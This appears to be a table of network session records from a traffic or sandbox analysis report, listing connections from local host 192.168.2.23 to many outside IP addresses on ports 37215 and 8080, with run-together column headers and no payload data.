                                                        19719192.168.2.2346904197.159.99.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19720192.168.2.2342596197.215.186.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19721192.168.2.2338200146.14.142.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19722192.168.2.235439841.144.202.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19723192.168.2.2348314140.78.165.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19724192.168.2.2347292119.208.124.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19725192.168.2.233383412.64.108.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19726192.168.2.2349328207.60.121.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19727192.168.2.23494064.6.201.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19728192.168.2.235385642.25.235.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19729192.168.2.233436694.225.248.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19730192.168.2.23435382.15.14.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19731192.168.2.235620888.29.244.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19732192.168.2.2334202202.58.209.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19733192.168.2.2340240133.58.157.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19734192.168.2.235700841.94.0.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19735192.168.2.235070840.150.153.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19736192.168.2.2338176157.208.20.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19737192.168.2.2357470197.197.126.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19738192.168.2.2336962197.120.171.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19739192.168.2.233498641.196.52.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19740192.168.2.2356498206.202.112.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19741192.168.2.234769090.213.10.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19742192.168.2.2341406123.84.190.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19743192.168.2.2352586197.87.80.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19744192.168.2.2335112157.237.68.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19745192.168.2.2355970197.127.9.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19746192.168.2.234902241.22.24.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19747192.168.2.2354866157.240.46.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19748192.168.2.2347962197.51.178.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19749192.168.2.2348980197.97.82.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19750192.168.2.233751841.185.203.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19751192.168.2.2345706157.245.39.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19752192.168.2.2350758197.158.240.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19753192.168.2.234741641.29.222.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19754192.168.2.235588483.13.105.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19755192.168.2.2340046157.104.209.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19756192.168.2.2346562197.44.19.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19757192.168.2.235890679.139.221.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19758192.168.2.2338238157.187.79.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19759192.168.2.234380641.250.4.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19760192.168.2.2357588197.2.51.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19761192.168.2.235263041.173.119.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19762192.168.2.2349508114.53.154.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19763192.168.2.234166241.57.83.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19764192.168.2.236002254.190.22.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19765192.168.2.2338242157.177.76.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19766192.168.2.2335742157.132.210.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19767192.168.2.233517697.190.185.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19768192.168.2.2337552157.230.55.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19769192.168.2.2352408157.37.25.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19770192.168.2.233635694.44.184.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19771192.168.2.2351988197.138.131.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19772192.168.2.2347252157.255.146.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19773192.168.2.2345048157.38.152.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19774192.168.2.2333774157.75.203.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19775192.168.2.2349324197.204.7.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19776192.168.2.234571041.181.53.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19777192.168.2.2351626167.166.76.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19778192.168.2.233339841.178.162.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19779192.168.2.234413841.28.31.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19780192.168.2.2357662170.98.235.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19781192.168.2.2335128197.158.231.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19782192.168.2.233443441.240.177.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19783192.168.2.2355948157.126.172.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19784192.168.2.2344304157.202.113.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19785192.168.2.2334658162.80.157.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19786192.168.2.235696241.195.40.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19787192.168.2.233307085.21.228.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19788192.168.2.2335198197.150.173.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19789192.168.2.2352840197.39.118.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19790192.168.2.2342138157.37.160.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19791192.168.2.2352688157.139.96.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19792192.168.2.2339752157.218.206.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19793192.168.2.233896074.215.22.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19794192.168.2.234274041.192.48.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19795192.168.2.2349714157.93.10.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19796192.168.2.2335144157.168.177.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19797192.168.2.233502214.93.231.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19798192.168.2.2354942197.199.144.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19799192.168.2.235187641.64.55.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19800192.168.2.233847883.9.31.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19801192.168.2.235058441.97.203.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19802192.168.2.2335332130.249.109.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19803192.168.2.233796458.9.110.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19804192.168.2.234532441.99.56.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19805192.168.2.2343886141.106.206.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19806192.168.2.2355824197.30.192.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19807192.168.2.233589041.228.195.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19808192.168.2.234187097.106.207.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19809192.168.2.2349052184.28.94.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19810192.168.2.2358736197.17.120.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19811192.168.2.2345288199.95.239.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19812192.168.2.2348582197.59.79.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19813192.168.2.2334138197.255.216.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19814192.168.2.2358624195.155.128.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19815192.168.2.2353682197.31.95.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19816192.168.2.233679641.128.152.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19817192.168.2.2333974157.136.124.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19818192.168.2.2340802157.237.69.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19819192.168.2.2356556157.25.224.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19820192.168.2.2359016197.13.242.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19821192.168.2.233663841.66.77.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19822192.168.2.2348492197.100.210.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19823192.168.2.2354166157.141.162.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19824192.168.2.2348256157.138.88.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19825192.168.2.233750641.249.27.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19826192.168.2.2354990157.196.4.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19827192.168.2.2349740197.226.159.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19828192.168.2.2339764197.77.153.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19829192.168.2.2340168157.82.198.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19830192.168.2.2352518182.100.47.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19831192.168.2.2356716157.30.121.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19832192.168.2.233396641.43.216.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19833192.168.2.233516841.91.10.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19834192.168.2.2336646157.11.248.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19835192.168.2.233794257.128.32.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19836192.168.2.235965241.162.63.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19837192.168.2.2359216197.229.39.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19838192.168.2.233506018.151.100.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19839192.168.2.2332996157.164.199.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19840192.168.2.2347040197.197.97.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19841192.168.2.2344452157.61.247.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19842192.168.2.235688641.31.93.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19843192.168.2.234133041.107.54.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19844192.168.2.2347620157.95.121.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19845192.168.2.235989658.226.85.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19846192.168.2.2344684133.54.80.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19847192.168.2.2346008197.160.141.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19848192.168.2.2358770188.78.0.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19849192.168.2.235680441.73.14.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19850192.168.2.2359380197.215.210.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19851192.168.2.2334700157.8.60.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19852192.168.2.2360858179.112.14.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19853192.168.2.2349762157.245.38.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19854192.168.2.2353172197.198.16.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19855192.168.2.2351210197.42.208.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19856192.168.2.2355512157.161.48.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19857192.168.2.234007441.47.166.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19858192.168.2.2345558157.252.106.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19859192.168.2.2360282197.239.212.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19860192.168.2.2333830157.247.91.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19861192.168.2.233324073.177.103.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19862192.168.2.234730866.174.191.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19863192.168.2.233673070.167.205.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19864192.168.2.2338194107.172.193.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19865192.168.2.2334588210.166.113.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19866192.168.2.2352342138.82.188.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19867192.168.2.2359988149.168.252.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19868192.168.2.2344468188.102.152.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19869192.168.2.2358914105.28.152.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19870192.168.2.2352166105.22.139.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19871192.168.2.2353156184.6.48.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19872192.168.2.234587277.59.71.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19873192.168.2.2350118102.247.20.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19874192.168.2.2349400101.185.100.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19875192.168.2.2337004163.152.139.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19876192.168.2.23347881.220.157.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19877192.168.2.2351362130.150.225.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19878192.168.2.234673296.211.192.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19879192.168.2.2353896184.68.27.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19880192.168.2.2336374105.63.151.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19881192.168.2.233964423.61.224.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19882192.168.2.234454275.242.208.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19883192.168.2.2351644104.167.232.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19884192.168.2.235892843.169.203.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19885192.168.2.235467232.78.209.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19886192.168.2.234218893.242.248.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19887192.168.2.2334274165.48.160.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19888192.168.2.2352452124.39.77.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19889192.168.2.2344366156.148.73.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19890192.168.2.2341898181.156.139.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19891192.168.2.2350924104.253.166.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19892192.168.2.234408078.87.129.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19893192.168.2.2342050120.76.100.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19894192.168.2.2357514182.119.172.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19895192.168.2.2338652102.38.53.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19896192.168.2.23495269.25.79.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19897192.168.2.233303457.6.204.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19898192.168.2.2352496164.163.38.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19899192.168.2.2339288186.170.110.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19900192.168.2.233801632.221.36.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19901192.168.2.2334592192.208.174.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19902192.168.2.2356722128.232.229.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19903192.168.2.2334526196.109.21.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19904192.168.2.2357898222.88.41.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19905192.168.2.2343228175.137.27.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19906192.168.2.234115624.70.226.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19907192.168.2.2336304147.133.155.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19908192.168.2.234446693.155.90.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19909192.168.2.233385670.149.204.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19910192.168.2.235938648.19.26.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19911192.168.2.2340940185.188.146.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19912192.168.2.2359270221.191.143.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19913192.168.2.2338572122.121.120.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19914192.168.2.2336560111.40.121.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19915192.168.2.2341182130.157.108.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19916192.168.2.234310685.226.87.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19917192.168.2.235348671.15.46.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19918192.168.2.2355850184.183.66.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19919192.168.2.2350942217.32.24.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19920192.168.2.2351902142.207.29.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19921192.168.2.233478876.25.88.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19922192.168.2.2351832192.177.83.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19923192.168.2.234958892.5.218.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19924192.168.2.233988497.181.88.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19925192.168.2.23540568.218.79.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19926192.168.2.2347816157.33.30.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19927192.168.2.2351864130.205.218.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19928192.168.2.2357626176.15.234.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
